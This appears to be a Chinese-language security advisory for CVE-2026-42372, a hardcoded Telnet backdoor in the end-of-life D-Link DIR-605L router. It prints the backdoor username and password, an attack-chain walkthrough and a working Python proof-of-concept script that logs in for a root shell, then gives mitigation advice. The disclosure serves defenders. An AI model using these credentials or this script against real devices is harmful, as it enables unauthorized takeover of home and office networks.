CVE-2026-42372 CVSS 8.8 高危

CVE-2026-42372 D-Link DIR-605L硬编码Telnet后门漏洞

披露日期: 2026-05-04

来源: 33c584b5-0579-4c06-b2a0-8d8329fcab9c

漏洞信息

漏洞编号

CVE-2026-42372

漏洞类型

硬编码后门

CVSS评分

8.8 高危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

D-Link DIR-605L

漏洞概述

D-Link DIR-605L（硬件版本A1）路由器存在严重的硬编码Telnet后门漏洞。由于该设备已达到生命周期结束（EOL）状态，官方不会提供任何修复补丁。攻击者无需认证即可利用该后门获取设备的Root权限，完全接管设备控制权，对局域网安全构成极高威胁。

技术细节

该漏洞源于设备的启动脚本/bin/telnetd.sh在开机时自动启动Telnet守护进程，并预设了硬编码的后门凭据。用户名为“Alphanetworks”，密码为“wrgn35_dlwbr_dir605l”，存储于/etc/alpha_config/image_sign中。设备使用的自定义telnetd二进制文件通过-u参数处理认证，而login程序仅使用strcmp()函数进行简单的字符串比对。这种弱验证机制允许同一局域网内的攻击者直接使用硬编码凭据登录，从而获得具有完整系统管理权限的Root Shell，执行任意系统命令。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描局域网，寻找D-Link DIR-605L设备，并确认其Telnet端口（23/TCP）是否开放。

STEP 2

2. 建立连接

攻击者使用Telnet客户端连接到目标设备的23端口。

STEP 3

3. 利用后门认证

攻击者使用硬编码的用户名'Alphanetworks'和密码'wrgn35_dlwbr_dir605l'进行登录。

STEP 4

4. 获取权限

绕过正常认证机制，设备返回Root Shell，攻击者获得完全的系统控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import telnetlib
import sys

# Exploit for CVE-2026-42372
# Target: D-Link DIR-605L (Rev A1)
# Default IP: 192.168.0.1

def exploit_poc(ip):
    user = "Alphanetworks"
    password = "wrgn35_dlwbr_dir605l"
    port = 23
    
    try:
        print(f"[*] Connecting to {ip} on port {port}...")
        tn = telnetlib.Telnet(ip, port, timeout=10)
        
        # The device uses a custom login mechanism, but usually presents a login prompt
        tn.read_until(b"login: ")
        tn.write(user.encode('ascii') + b"\n")
        
        tn.read_until(b"Password: ")
        tn.write(password.encode('ascii') + b"\n")
        
        # Check if we have a shell (root)
        tn.write(b"id\n")
        response = tn.read_until(b"#", timeout=5).decode('ascii')
        
        if "uid=0(root)" in response or "#" in response:
            print("[+] Exploit successful! Root shell obtained.")
            print("[+] Response from id command:")
            print(response)
        else:
            print("[-] Exploit failed. Credentials might be incorrect or service unavailable.")
            print(response)
            
        tn.close()
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    target_ip = "192.168.0.1" # Replace with actual target IP
    exploit_poc(target_ip)

影响范围

D-Link DIR-605L Hardware Revision A1

防御指南

临时缓解措施

由于厂商已停止对该型号设备（EOL）的技术支持，且不会发布安全更新，唯一的彻底缓解措施是更换为受支持的新型路由器。在更换前，应确保该设备放置在隔离的网络区域（VLAN），并严格限制对TCP 23端口的访问，仅允许管理员IP进行连接。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表